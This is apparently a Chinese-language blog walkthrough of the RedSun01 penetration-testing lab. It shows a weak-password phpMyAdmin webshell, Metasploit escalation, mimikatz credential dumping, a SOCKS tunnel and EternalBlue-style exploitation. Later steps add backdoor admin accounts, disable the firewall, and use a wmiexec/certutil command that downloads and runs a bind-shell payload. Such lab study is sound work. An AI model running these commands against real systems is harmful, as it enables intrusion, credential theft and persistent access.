RedSun01

环境安装

信息收集

现在是已经知道ip的前提之下,我们尝试攻击

  1. 通过ip直接就扫描端口

    image-20240115203934384

    image-20240115204051039

    出现了一个php探针

    image-20240115204150506

    尝试爆破一下

    发现存在弱口令

    root

    root

  2. 有服务就就尝试搜索一下子域名

    刚才有一个弱口令,现在如果有一个phpmyadmin就好了

    然后他来了

    image-20240115213811345

  3. 目录扫描

  4. 子域名爆破

跳板机

通过phpmyadmin+慢日志getshell

  1. 由于扫出来了phpmyadmin,所以就直接访问了

    image-20240115213848670

    root

    root

    最全phpmyadmin漏洞汇总_phpmyadmin弱口令-CSDN博客

    参考了一下这个

    尝试使用mysql慢日志的方式下写入shell

    现在就得思考如何才能拿到网站的绝对路径(也就是说操作系统的路径)
    然后突然想到了探针的那个界面

    image-20240115220049070

    发现这个想到了可能会存在测试路径

    image-20240115220205777

    获取网站路径绝对路径的方法汇总 - 看不尽的尘埃 - 博客园 (cnblogs.com)

    话不多说

    去写shell

    image-20240115220638737

    image-20240115220630342

    尝试访问

    image-20240115222107671

    image-20240115222134229

    image-20240115222152209

msf

  1. 连接

    image-20240122164303440

  2. 提权

    image-20240122164248591

    image-20240122164243376

  3. mimikatz(kiwi)

    • 迁移到64为应用当中

      1
      2
      ps
      migrate pid

    • 加载模块

      1
      load mimikatz
      1
      2
      load wiki
      creds_all
         # 将cs和msf联动

  4. 创建一个监听器

    image-20240122173306206

  5. msf

    在有一个session的前提之下

    1
    2
    3
    4
    5
    6
    use exploit/windows/local/payload_inject 
    set payload windows/meterpreter/reverse_http
    set lhost 192.168.79.138 # cs地址
    set lport  9999 # Cs监听器的Port
    set DisablePayloadHandler 1
    exploit/run

    image-20240122202621837

    成功联动

使用msf搭建隧道

1
2
3
4
5
6
use use auxiliary/server/socks4a
set VERSION 4a
set session 3
set SRVPORT 1080
exploit
back

内网信息收集

上传paylaod,使用msf连接

  1. 查看内网网段

    1
    2
    3
    4
    5
    use post/windows/gather/arp_scanner
    set RHOSTS 192.168.52.0/24
    set session 3
    exploit
    back

  2. 收集存活主机

    1
    2
    3
    4
    use post/windows/gather/arp_scanner
    set RHOSTS 192.168.52.0/24
    set session 3
    exploit

    image-20240116213149341

  3. 获取每一主机的端口信息

    image-20240122221119098

    image-20240116213415088

    还有一个主机就不扫了

  4. 接着对跳板机做信息收集

    • 操作系统版本

      1
      systeminfo /fo  list

    • 获取密码

      在这里发现发现x86的payload跑不了x64程序,所以尝试使用进程迁移的方式转移到其他进程

      1
      2
      3
      4
      5
      6
      getuid
      getsystem
      ps # 查找可以用于迁移的进程
      migrate pid
      kiwi_cmd sekurlsa::logonpasswords 
      rev2self

      image-20240116220321187

    • 查看是否存在域环境

      1

后渗透

win server 2003

  1. 发现192.168.52.141 存在445端口,可能存在永恒之蓝漏洞

    image-20240122220006925

    一个一个的试试、

    发现第3个能执行,这个是一个执行命令的

    image-20240122235340204

    创建一个用户,并加入到管理组中

    1
    2
    3
    4
    5
    6
    7
    set COMMAND net user hack hack /add
    exploit
    set COMMAND net user hack passwd /add
    exploit

    net localgroup administrators hack /add
    exploit

  2. 尝试打开远程桌面

    3389

    1
    wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

    or 

    1
    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    发现并不行

    一直没有上线

  3. talent

    1
    2
    set COMMAND sc config tlntsvr start= auto
    set COMMAND net start telnet

    查看23号端口是否存在

    1
    set COMMAND netstat -an

    image-20240123003121679

    使用talent

    1
    2
    3
    4
    5
    6
    7
    8
    9
    use auxiliary/scanner/telnet/telnet_login

    set RHOSTS 192.168.52.141

    set username hack

    set PASSWORD qaz@123

    exploit

    image-20240123003345012

    密码不对禁止登录

    得到了新的shell

    image-20240123003453747

    但是这个session有问题,并不能获取返回的结果

    image-20240123004258151

    在外面使用

    image-20240123004424632

    ctrl+] 再输入q退出telnet

    现在基本上拿到了,接下来试试win server 2012

win server 2012

  1. 目录扫描

    发现开启了端口80,那就扫描一下目录

    image-20240123180135784

    并没有什么目录

  2. 发现存在443

    尝试利用一下

    添加一个用户

    1
    2
    set COMMAND net user hack qaz@123 /add
    set COMMAND net localgroup administrators hack /add

    开启telnet服务

    1
    2
    set COMMAND sc config tlntsvr start= auto
    set COMMAND net start telnet

    image-20240123182027066

  3. 尝试利用135漏洞

    135\137\138\139\445 永恒之蓝

    失败,不能直接获得session

  4. 尝试利用389

    发现只用用于提升权限

  5. 发现已经没有可以利用的端口了

    尝试开启3389端口

    在这尝试关闭防火墙

    1
    set COMMAND netsh advfirewall set allprofiles state off

    image-20240123202539606

    image-20240123202527516

    尝试连接

    1
    2
    3
    4
    5
    6
    7
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

    net start termservice

    image-20240123203902941

    image-20240123204525402

    怎么样都不能连接

  6. psexec.exe

    image-20240124003258274

    发现并不能来连接的上

  7. cscript.exe vmiexec.vbs

    1
    cscript.exe c:\test\phpStudy\WWW\wmiexec.vbs /cmd 192.168.52.138 administrator PASSWD "whoami"

    image-20240124003523550

    成功执行

    1
    cscript.exe c:\test\phpStudy\WWW\wmiexec.vbs /cmd 192.168.52.138 administrator passwd "certutil.exe -urlcache -split -f http://192.168.52.143/w_64_6666_bind_tcp.exe&w_64_6666_bind_tcp.exe"

    image-20240124011134442

    然后我们主动连接一下

    1
    2
    3
    4
    5
    6
    use exploit/multi/handler
    set payload windows/x64/meterpreter/bind_tcp
    show options
    set lport 6767 #payload 指定的端口
    set rhost 192.168.52.138
    run

    image-20240124011307776

    成功上线

#靶场记录
RedSun01
https://tsy244.github.io/2024/01/15/靶场记录/RedSun01/
Author
August Rosenberg
Posted on
January 15, 2024
Licensed under